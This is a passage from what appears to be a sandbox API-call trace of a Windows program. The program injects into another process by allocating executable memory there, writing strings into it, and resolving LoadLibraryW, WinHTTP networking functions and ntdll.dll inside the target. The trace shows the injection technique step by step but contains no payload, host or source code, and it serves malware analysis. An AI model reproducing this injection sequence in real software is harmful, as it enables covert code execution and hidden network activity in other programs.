lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.084] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.085] ResetEvent (hEvent=0x640) returned 1 [0190.085] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.085] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.085] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.085] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.085] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.086] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0190.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adb15e, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0190.086] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0190.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adb15e, cbMultiByte=-1, lpWideCharStr=0x32acf840, cchWideChar=12 | out: lpWideCharStr="WINHTTP.dll") returned 12 [0190.088] lstrlenW (lpString="WINHTTP.dll") returned 11 [0190.088] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.088] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf840*, nSize=0x18, lpNumberOfBytesWritten=0xcdad8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcdad8*=0x18) returned 1 [0190.089] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0190.089] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf4e0 [0190.089] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.089] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf4e0*, nSize=0x18, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0x32acf4e0*, lpNumberOfBytesWritten=0xcd9e8*=0x18) returned 1 [0190.089] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesWritten=0xcd9e8*=0xd8) returned 1 [0190.090] ResetEvent (hEvent=0x640) returned 1 [0190.090] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.093] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0190.093] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.093] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf4e0 | out: hHeap=0x2150000) returned 1 [0190.093] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.093] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0190.093] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.094] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.094] lstrlenA (lpString="WinHttpOpenRequest") returned 18 [0190.094] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.094] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb14a*, nSize=0x13, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb14a*, lpNumberOfBytesWritten=0xcdac8*=0x13) returned 1 [0190.095] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.095] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf570 [0190.095] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.096] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf570*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf570*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.096] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.097] ResetEvent (hEvent=0x640) returned 1 [0190.097] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.097] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.097] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.097] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf570 | out: hHeap=0x2150000) returned 1 [0190.097] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.098] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.098] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.098] lstrlenA (lpString="WinHttpSetTimeouts") returned 18 [0190.098] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.098] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb0a4*, nSize=0x13, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb0a4*, lpNumberOfBytesWritten=0xcdac8*=0x13) returned 1 [0190.098] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.098] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.098] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.099] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.099] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.099] ResetEvent (hEvent=0x640) returned 1 [0190.099] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.100] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.100] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.100] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.100] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.100] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.100] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.101] lstrlenA (lpString="WinHttpOpen") returned 11 [0190.101] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.101] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb0ba*, nSize=0xc, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb0ba*, lpNumberOfBytesWritten=0xcdac8*=0xc) returned 1 [0190.101] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.101] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf9c0 [0190.101] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.101] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf9c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf9c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.104] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.104] ResetEvent (hEvent=0x640) returned 1 [0190.104] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.104] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.104] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.104] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf9c0 | out: hHeap=0x2150000) returned 1 [0190.105] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.105] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.105] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.105] lstrlenA (lpString="WinHttpCloseHandle") returned 18 [0190.105] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.105] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb0c8*, nSize=0x13, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb0c8*, lpNumberOfBytesWritten=0xcdac8*=0x13) returned 1 [0190.106] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.106] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acefa0 [0190.106] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.106] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acefa0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acefa0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.106] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.107] ResetEvent (hEvent=0x640) returned 1 [0190.107] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.107] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.107] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.107] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acefa0 | out: hHeap=0x2150000) returned 1 [0190.107] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.108] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.108] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.108] lstrlenA (lpString="WinHttpConnect") returned 14 [0190.108] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.108] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb0de*, nSize=0xf, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb0de*, lpNumberOfBytesWritten=0xcdac8*=0xf) returned 1 [0190.109] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.109] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0190.109] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.109] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.109] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.110] ResetEvent (hEvent=0x640) returned 1 [0190.110] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.110] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.110] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.110] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0190.110] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.111] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.111] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.111] lstrlenA (lpString="WinHttpQueryHeaders") returned 19 [0190.111] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.111] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb0f0*, nSize=0x14, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb0f0*, lpNumberOfBytesWritten=0xcdac8*=0x14) returned 1 [0190.111] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.112] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfb40 [0190.112] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.112] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acfb40*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acfb40*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.112] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.113] ResetEvent (hEvent=0x640) returned 1 [0190.113] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.113] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.113] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.113] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfb40 | out: hHeap=0x2150000) returned 1 [0190.113] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.114] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.114] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.114] lstrlenA (lpString="WinHttpReceiveResponse") returned 22 [0190.114] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.114] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb106*, nSize=0x17, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb106*, lpNumberOfBytesWritten=0xcdac8*=0x17) returned 1 [0190.114] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.114] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.114] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.115] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.115] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.115] ResetEvent (hEvent=0x640) returned 1 [0190.116] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.116] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.116] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.116] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.116] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.117] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.117] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.117] lstrlenA (lpString="WinHttpSendRequest") returned 18 [0190.117] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.117] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb120*, nSize=0x13, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb120*, lpNumberOfBytesWritten=0xcdac8*=0x13) returned 1 [0190.117] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.117] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0190.117] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.118] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.120] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.120] ResetEvent (hEvent=0x640) returned 1 [0190.121] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.121] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.121] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.121] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0190.121] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.121] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.121] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.122] lstrlenA (lpString="WinHttpSetOption") returned 16 [0190.122] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.122] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb136*, nSize=0x11, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb136*, lpNumberOfBytesWritten=0xcdac8*=0x11) returned 1 [0190.122] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.122] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0190.122] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.122] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.123] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.123] ResetEvent (hEvent=0x640) returned 1 [0190.123] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.123] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.124] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.124] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0190.124] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.124] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.124] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0190.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adb19e, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0190.124] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa50 [0190.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adb19e, cbMultiByte=-1, lpWideCharStr=0x32acfa50, cchWideChar=10 | out: lpWideCharStr="ntdll.dll") returned 10 [0190.124] lstrlenW (lpString="ntdll.dll") returned 9 [0190.124] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.125] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acfa50*, nSize=0x14, lpNumberOfBytesWritten=0xcdad8 | out: lpBuffer=0x32acfa50*, lpNumberOfBytesWritten=0xcdad8*=0x14) returned 1 [0190.125] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0190.125] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf570 [0190.125] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.125] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf570*, nSize=0x18, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0x32acf570*, lpNumberOfBytesWritten=0xcd9e8*=0x18) returned 1 